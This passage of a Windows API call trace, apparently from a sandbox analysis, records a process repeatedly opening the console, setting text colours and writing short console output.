lpCs=0x5f5efc0) returned 0 [0152.367] GetLastError () returned 0xcb [0152.367] GetConsoleOutputCP () returned 0x1b5 [0152.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.367] GetLastError () returned 0xcb [0152.367] GetConsoleOutputCP () returned 0x1b5 [0152.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.367] GetLastError () returned 0xcb [0152.367] GetConsoleOutputCP () returned 0x1b5 [0152.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.367] GetLastError () returned 0xcb [0152.367] GetConsoleOutputCP () returned 0x1b5 [0152.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.368] GetLastError () returned 0xcb [0152.368] GetConsoleOutputCP () returned 0x1b5 [0152.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.368] GetLastError () returned 0xcb [0152.368] GetConsoleOutputCP () returned 0x1b5 [0152.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.368] GetLastError () returned 0xcb [0152.368] GetConsoleOutputCP () returned 0x1b5 [0152.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.368] GetLastError () returned 0xcb [0152.373] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0152.373] GetLastError () returned 0xcb [0152.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.373] GetLastError () returned 0xcb [0152.374] GetConsoleOutputCP () returned 0x1b5 [0152.374] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.374] GetLastError () returned 0xcb [0152.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0152.494] GetLastError () returned 0xcb [0152.494] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x5f5f030 | out: lpMode=0x5f5f030) returned 1 [0152.494] GetLastError () returned 0xcb [0152.497] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0152.497] GetLastError () returned 0xcb [0152.497] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.498] GetLastError () returned 0xcb [0152.501] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0152.501] GetLastError () returned 0xcb [0152.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.501] GetLastError () returned 0xcb [0152.505] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.505] GetLastError () returned 0xcb [0152.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.505] GetLastError () returned 0xcb [0152.507] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0152.507] GetLastError () returned 0xcb [0152.510] CloseHandle (hObject=0x23) returned 1 [0152.510] GetLastError () returned 0xcb [0152.514] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.515] GetLastError () returned 0xcb [0152.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.515] GetLastError () returned 0xcb [0152.515] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0152.515] GetLastError () returned 0xcb [0152.516] CloseHandle (hObject=0x23) returned 1 [0152.516] GetLastError () returned 0xcb [0152.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.516] GetLastError () returned 0xcb [0152.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x5f5efc8 | out: lpMode=0x5f5efc8) returned 1 [0152.516] GetLastError () returned 0xcb [0152.520] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.520] GetLastError () returned 0xcb [0152.520] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.521] GetLastError () returned 0xcb [0152.523] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2e03af0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e03af0*, lpNumberOfCharsWritten=0x5f5efac*=0x4f) returned 1 [0152.524] GetLastError () returned 0xcb [0152.525] CloseHandle (hObject=0x23) returned 1 [0152.525] GetLastError () returned 0xcb [0152.528] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.529] GetLastError () returned 0xcb [0152.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.566] GetLastError () returned 0xcb [0152.566] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0152.566] GetLastError () returned 0xcb [0152.566] CloseHandle (hObject=0x23) returned 1 [0152.566] GetLastError () returned 0xcb [0152.570] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.570] GetLastError () returned 0xcb [0152.570] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.570] GetLastError () returned 0xcb [0152.570] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0152.570] GetLastError () returned 0xcb [0152.571] CloseHandle (hObject=0x23) returned 1 [0152.571] GetLastError () returned 0xcb [0152.574] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.575] GetLastError () returned 0xcb [0152.575] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.575] GetLastError () returned 0xcb [0152.575] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.575] GetLastError () returned 0xcb [0152.575] CloseHandle (hObject=0x23) returned 1 [0152.575] GetLastError () returned 0xcb [0152.578] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.579] GetLastError () returned 0xcb [0152.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.579] GetLastError () returned 0xcb [0152.579] GetConsoleOutputCP () returned 0x1b5 [0152.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.579] GetLastError () returned 0xcb [0152.582] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0152.582] GetLastError () returned 0xcb [0152.582] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.582] GetLastError () returned 0xcb [0152.585] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0152.586] GetLastError () returned 0xcb [0152.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.586] GetLastError () returned 0xcb [0152.589] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.589] GetLastError () returned 0xcb [0152.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.590] GetLastError () returned 0xcb [0152.590] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0152.590] GetLastError () returned 0xcb [0152.590] CloseHandle (hObject=0x2f) returned 1 [0152.590] GetLastError () returned 0xcb [0152.594] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.594] GetLastError () returned 0xcb [0152.594] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.594] GetLastError () returned 0xcb [0152.594] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0152.594] GetLastError () returned 0xcb [0152.594] CloseHandle (hObject=0x2f) returned 1 [0152.594] GetLastError () returned 0xcb [0152.597] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.598] GetLastError () returned 0xcb [0152.598] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.598] GetLastError () returned 0xcb [0152.598] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2e04214*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e04214*, lpNumberOfCharsWritten=0x5f5efac*=0x4f) returned 1 [0152.598] GetLastError () returned 0xcb [0152.598] CloseHandle (hObject=0x2f) returned 1 [0152.598] GetLastError () returned 0xcb [0152.601] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.636] GetLastError () returned 0xcb [0152.636] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.637] GetLastError () returned 0xcb [0152.637] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0152.637] GetLastError () returned 0xcb [0152.637] CloseHandle (hObject=0x2f) returned 1 [0152.637] GetLastError () returned 0xcb [0152.640] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.641] GetLastError () returned 0xcb [0152.641] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.641] GetLastError () returned 0xcb [0152.641] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0152.641] GetLastError () returned 0xcb [0152.641] CloseHandle (hObject=0x2f) returned 1 [0152.641] GetLastError () returned 0xcb [0152.645] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.645] GetLastError () returned 0xcb [0152.645] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.645] GetLastError () returned 0xcb [0152.645] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.646] GetLastError () returned 0xcb [0152.646] CloseHandle (hObject=0x2f) returned 1 [0152.646] GetLastError () returned 0xcb [0152.649] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.649] GetLastError () returned 0xcb [0152.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.649] GetLastError () returned 0xcb [0152.649] GetConsoleOutputCP () returned 0x1b5 [0152.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.650] GetLastError () returned 0xcb [0152.653] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0152.653] GetLastError () returned 0xcb [0152.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.653] GetLastError () returned 0xcb [0152.656] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0152.656] GetLastError () returned 0xcb [0152.656] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.656] GetLastError () returned 0xcb [0152.659] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.660] GetLastError () returned 0xcb [0152.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.660] GetLastError () returned 0xcb [0152.660] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0152.660] GetLastError () returned 0xcb [0152.660] CloseHandle (hObject=0x3b) returned 1 [0152.661] GetLastError () returned 0xcb [0152.664] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.664] GetLastError () returned 0xcb [0152.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.664] GetLastError () returned 0xcb [0152.664] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0152.664] GetLastError () returned 0xcb [0152.664] CloseHandle (hObject=0x3b) returned 1 [0152.664] GetLastError () returned 0xcb [0152.667] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.668] GetLastError () returned 0xcb [0152.668] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.668] GetLastError () returned 0xcb [0152.668] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2e04744*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e04744*, lpNumberOfCharsWritten=0x5f5efac*=0x3e) returned 1 [0152.668] GetLastError () returned 0xcb [0152.668] CloseHandle (hObject=0x3b) returned 1 [0152.668] GetLastError () returned 0xcb [0152.671] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.716] GetLastError () returned 0xcb [0152.716] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.716] GetLastError () returned 0xcb [0152.716] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0152.716] GetLastError () returned 0xcb [0152.716] CloseHandle (hObject=0x3b) returned 1 [0152.716] GetLastError () returned 0xcb [0152.720] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.720] GetLastError () returned 0xcb [0152.720] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.720] GetLastError () returned 0xcb [0152.720] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0152.720] GetLastError () returned 0xcb [0152.721] CloseHandle (hObject=0x3b) returned 1 [0152.721] GetLastError () returned 0xcb [0152.724] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.724] GetLastError () returned 0xcb [0152.724] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.725] GetLastError () returned 0xcb [0152.725] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.725] GetLastError () returned 0xcb [0152.725] CloseHandle (hObject=0x3b) returned 1 [0152.725] GetLastError () returned 0xcb [0152.729] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.729] GetLastError () returned 0xcb [0152.729] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.730] GetLastError () returned 0xcb [0152.730] GetConsoleOutputCP () returned 0x1b5 [0152.730] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.730] GetLastError () returned 0xcb [0152.734] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0152.734] GetLastError () returned 0xcb [0152.734] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.735] GetLastError () returned 0xcb [0152.738] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0152.739] GetLastError () returned 0xcb [0152.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.739] GetLastError () returned 0xcb [0152.743] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.743] GetLastError () returned 0xcb [0152.743] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.744] GetLastError () returned 0xcb [0152.744] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0152.744] GetLastError () returned 0xcb [0152.744] CloseHandle (hObject=0x47) returned 1 [0152.744] GetLastError () returned 0xcb [0152.748] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.749] GetLastError () returned 0xcb [0152.749] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.749] GetLastError () returned 0xcb [0152.749] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0152.749] GetLastError () returned 0xcb [0152.749] CloseHandle (hObject=0x47) returned 1 [0152.750] GetLastError () returned 0xcb [0152.754] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.791] GetLastError () returned 0xcb [0152.791] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.792] GetLastError () returned 0xcb [0152.792] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2e04b5c*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e04b5c*, lpNumberOfCharsWritten=0x5f5efac*=0x11) returned 1 [0152.792] GetLastError () returned 0xcb [0152.792] CloseHandle (hObject=0x47) returned 1 [0152.792] GetLastError () returned 0xcb [0152.796] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.797] GetLastError () returned 0xcb [0152.797] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.797] GetLastError () returned 0xcb [0152.797] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0152.797] GetLastError () returned 0xcb [0152.797] CloseHandle (hObject=0x47) returned 1 [0152.797] GetLastError () returned 0xcb [0152.802] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.802] GetLastError () returned 0xcb [0152.802] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.802] GetLastError () returned 0xcb [0152.802] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0152.802] GetLastError () returned 0xcb [0152.803] CloseHandle (hObject=0x47) returned 1 [0152.803] GetLastError () returned 0xcb [0152.806] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.807] GetLastError () returned 0xcb [0152.807] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.807] GetLastError () returned 0xcb [0152.807] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.807] GetLastError () returned 0xcb [0152.807] CloseHandle (hObject=0x47) returned 1 [0152.807] GetLastError () returned 0xcb [0152.812] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.812] GetLastError () returned 0xcb [0152.812] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.812] GetLastError () returned 0xcb [0152.812] GetConsoleOutputCP () returned 0x1b5 [0152.812] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.812] GetLastError () returned 0xcb [0152.816] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, 